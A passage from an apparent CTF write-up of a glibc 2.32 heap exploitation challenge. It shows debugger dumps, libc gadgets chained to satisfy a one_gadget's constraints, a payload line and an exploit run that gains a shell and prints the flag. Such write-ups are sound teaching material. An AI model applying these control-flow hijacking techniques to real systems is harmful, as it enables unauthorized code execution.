0x55555555ee80: 0x0000000000000000 0x0000000000000000
0x55555555ee90: 0x0000000000000000 0x0000000000000031
0x55555555eea0: 0x0000000000000041 0x0000000000000000
0x55555555eeb0: 0x0000000000000000 0x0000000000000000
So, yeah, that’s the reason, I put that chunk there previously (hard to explain this whole mess in the right order).
By using the above gadget, we can point rax
to our chunk on the heap, and it will then jump to rax+0x8
(which currently is 0xdeadbeef
). Not quite there yet, but at least we have one register more containing an address, which is under our control.
$rax : 0x000055555555ee70 → 0x5a5a5a5a5a5a5a5a ("ZZZZZZZZ"?)
$rbx : 0x00007ffff7ffd000 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$rcx : 0x0
$rdx : 0x0000555555557dd8 → 0x0000555555555170 → <__do_global_dtors_aux+0> endbr64
$rsp : 0x00007fffffffda70 → 0x00007ffff7f2cd4b → 0x0000059a840fc085
$rbp : 0x00007fffffffdaf0 → 0x0000000000000000
$rsi : 0x0
$rdi : 0x0000555555558060 → 0x00007ffff7fc2520 → 0x00000000fbad2887
$rip : 0xdeadbeef
$r8 : 0x2
$r9 : 0x1
$r10 : 0x00007ffff7f73ac0 → 0x0000000100000000
$r11 : 0x246
$r12 : 0x0
$r13 : 0x00007fffffffda80 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$r14 : 0x0000555555557dd0 → 0x00005555555551c0 → <frame_dummy+0> endbr64
$r15 : 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
───────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
[!] Cannot disassemble from $PC
─────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffda70│+0x0000: 0x00007ffff7f2cd4b → 0x0000059a840fc085 ← $rsp
0x00007fffffffda78│+0x0008: 0x00007ffff7fe16ad → 0x8b0e75f685c4758b
0x00007fffffffda80│+0x0010: 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f ← $r13
0x00007fffffffda88│+0x0018: 0x00007ffff7ffe750 → 0x00007ffff7fce000 → 0x00010102464c457f
0x00007fffffffda90│+0x0020: 0x00007ffff7fc8000 → 0x00007ffff7dff000 → 0x03010102464c457f
0x00007fffffffda98│+0x0028: 0x00007ffff7ffda08 → 0x00007ffff7fd0000 → 0x00010102464c457f
[!] Cannot access memory at address 0xdeadbeef
Still, we just went from one crash to another…
But, we can now branch into another gadget:
0x7ffff7e7a4c7: mov rdx,QWORD PTR [rbx+0x40]
0x7ffff7e7a4cb: mov rdi,rbx
0x7ffff7e7a4ce: sub rdx,rsi
0x7ffff7e7a4d1: call QWORD PTR [rax+0x70]
payload = "Z"*8 + p64(libc.address+0x000000000007b4c7)
addfake(20, payload)
When executing this
$rax : 0x000055555555ee70 → 0x5a5a5a5a5a5a5a5a ("ZZZZZZZZ"?)
$rbx : 0x00007ffff7ffd000 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$rcx : 0x0
$rdx : 0x0000555555557dd8 → 0x0000555555555170 → <__do_global_dtors_aux+0> endbr64
$rsp : 0x00007fffffffda70 → 0x00007ffff7f2cd4b → 0x0000059a840fc085
$rbp : 0x00007fffffffdaf0 → 0x0000000000000000
$rsi : 0x0
$rdi : 0x0000555555558060 → 0x00007ffff7fc2520 → 0x00000000fbad2887
$rip : 0x00007ffff7e7a4c7 → 0x48df894840538b48
$r8 : 0x2
$r9 : 0x1
$r10 : 0x00007ffff7f73ac0 → 0x0000000100000000
$r11 : 0x246
$r12 : 0x0
$r13 : 0x00007fffffffda80 → 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$r14 : 0x0000555555557dd0 → 0x00005555555551c0 → <frame_dummy+0> endbr64
$r15 : 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x7ffff7e7a4ba cmp rdx, r13
0x7ffff7e7a4bd jae 0x7ffff7e7a718
0x7ffff7e7a4c3 mov rsi, QWORD PTR [rbx+0x10]
→ 0x7ffff7e7a4c7 mov rdx, QWORD PTR [rbx+0x40]
0x7ffff7e7a4cb mov rdi, rbx
0x7ffff7e7a4ce sub rdx, rsi
0x7ffff7e7a4d1 call QWORD PTR [rax+0x70]
0x7ffff7e7a4d4 test rax, rax
0x7ffff7e7a4d7 jle 0x7ffff7e7a6b0
──────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffda70│+0x0000: 0x00007ffff7f2cd4b → 0x0000059a840fc085 ← $rsp
0x00007fffffffda78│+0x0008: 0x00007ffff7fe16ad → 0x8b0e75f685c4758b
0x00007fffffffda80│+0x0010: 0x00007ffff7ffe1a0 → 0x0000555555554000 → 0x00010102464c457f ← $r13
0x00007fffffffda88│+0x0018: 0x00007ffff7ffe750 → 0x00007ffff7fce000 → 0x00010102464c457f
0x00007fffffffda90│+0x0020: 0x00007ffff7fc8000 → 0x00007ffff7dff000 → 0x03010102464c457f
0x00007fffffffda98│+0x0028: 0x00007ffff7ffda08 → 0x00007ffff7fd0000 → 0x00010102464c457f
gef➤ x/gx $rbx+0x40
0x7ffff7ffd040: 0x0000000000000000
This will now move the value from rbx+0x40
(0x0
) into rdx
and then call rax+0x70
. So, this will effectively zero out rdx
and we fulfilled the constraints for the one_gadget
from above (r12 == 0 & rdx == 0
).
Remember, that I put the one_gadget
address previously in one of the fake chunks? Surprise, it’s now exactly at rax+0x70
…
Finally at the end of the journey :)
$ python xpl.py 1
[*] '/home/kileak/ctf/lake/nilework/libc-2.32.so'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to chall.polygl0ts.ch on port 3800: Done
[*] LEAK : 0x55a9f31a0b09
[*] HEAP : 0x55aca9d09600
[*] HEAP guard : 0x55aca9d09
[*] LIBC leak : 0x7fb8f7cafa60
[*] LIBC : 0x7fb8f7aed000
[*] MAIN_ARENA : 0x7fb8f7cafa00
[*] PIE : 0x55aca8ac2080
[*] TARGET CHUNK : 0x7fb8f7ce61d0
[*] Paused (press any to continue)
[*] Switching to interactive mode
Goodbye! Thank you for using Nile.
$ ls
flag
ld-2.32.so
libc-2.32.so
run
$ cat flag
EPFL{Y3t_4n0th3r_h34pn0t3_th4t_w4s_1n_my_chall3ng3s_f0lder_f0r_t00_l0ng}
Phew, this challenge took a lot of time, going down so many rabbit holes, redoing the code execution part again and again. Though, I was cursing a LOT in the middle of the night, I enjoyed the challenge quite a lot in hindsight.
Still, quite curious for other peoples solution, to see, if it can be solved in an easier way, since this one was definitely a real pain.